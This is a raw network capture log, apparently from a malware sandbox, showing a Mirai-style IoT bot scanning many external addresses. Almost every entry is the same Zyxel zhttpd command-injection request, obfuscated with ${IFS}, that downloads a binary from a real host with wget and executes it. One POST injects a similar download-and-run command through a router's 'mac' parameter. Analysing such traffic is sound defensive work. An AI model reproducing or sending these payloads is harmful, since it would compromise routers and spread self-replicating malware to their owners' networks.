                                              Jan 29, 2024 07:03:43.892443895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3010192.168.2.144091675.157.112.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892474890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3011192.168.2.145419060.57.67.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892518044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3012192.168.2.1457764201.106.238.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892563105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3013192.168.2.146086069.69.127.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892582893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3014192.168.2.1448798138.82.133.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892627954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3015192.168.2.145549440.65.107.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892688036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3016192.168.2.144807088.251.92.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892712116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3017192.168.2.1450092114.70.144.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892741919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3018192.168.2.145914041.65.110.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892764091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3019192.168.2.1438758217.64.78.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892796040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3020192.168.2.1456164193.217.62.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892855883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3021192.168.2.1437042137.65.107.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892874002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3022192.168.2.1439114153.40.248.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892911911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3023192.168.2.1450022110.243.45.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892944098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3024192.168.2.1442862195.94.174.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892997026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3025192.168.2.1446446183.207.50.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.893033028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3026192.168.2.1454724169.175.15.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.893063068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3027192.168.2.1433886139.113.138.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.893093109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3028192.168.2.1460754212.241.31.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.893136024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3029192.168.2.1451320100.201.179.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.893189907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3030192.168.2.144869082.161.23.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.893203020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3031192.168.2.1453510190.7.120.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896537066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3032192.168.2.1440086143.225.88.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896573067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3033192.168.2.144900487.234.161.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896625996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3034192.168.2.1441256116.8.36.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896670103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3035192.168.2.1455102128.121.174.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896689892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3036192.168.2.143563834.171.210.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896727085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3037192.168.2.1445030135.198.70.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896785975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3038192.168.2.1453310189.248.226.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896842957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3039192.168.2.1457700149.86.211.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896874905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3040192.168.2.1448852105.88.253.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896914959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3041192.168.2.14381702.240.148.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.896948099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3042192.168.2.1433418177.153.81.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.897006989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3043192.168.2.1432926167.85.217.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.897017956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3044192.168.2.144930266.39.16.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.897063971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3045192.168.2.14439069.35.155.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.897102118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3046192.168.2.1437356104.19.134.1508080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.818820000 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:44.935698032 CET328INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 29 Jan 2024 06:03:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3047192.168.2.1440880138.25.37.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.905576944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3048192.168.2.1437920146.171.252.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.905630112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3049192.168.2.1452210111.22.70.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.905666113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3050192.168.2.145168685.18.133.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.905714035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3051192.168.2.143977289.211.33.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.905745983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3052192.168.2.1447338103.232.96.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.905798912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3053192.168.2.143962086.176.173.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.905848026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3054192.168.2.144109299.31.6.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.905893087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3055192.168.2.1445424163.200.230.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.905932903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3056192.168.2.143602644.93.114.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.905972004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3057192.168.2.143286431.3.189.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906018019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3058192.168.2.143482866.224.116.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906050920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3059192.168.2.143283019.189.41.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906075954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3060192.168.2.145655499.164.177.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906115055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3061192.168.2.1458710169.123.178.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906150103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3062192.168.2.1433110154.39.115.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906204939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3063192.168.2.1435434189.45.96.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906234980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3064192.168.2.1444510181.69.67.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906296015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3065192.168.2.144285866.71.216.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906326056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3066192.168.2.1439234194.220.163.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906358004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3067192.168.2.145348273.109.58.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906387091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3068192.168.2.1435846201.207.35.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906430960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3069192.168.2.1435238171.89.134.200443
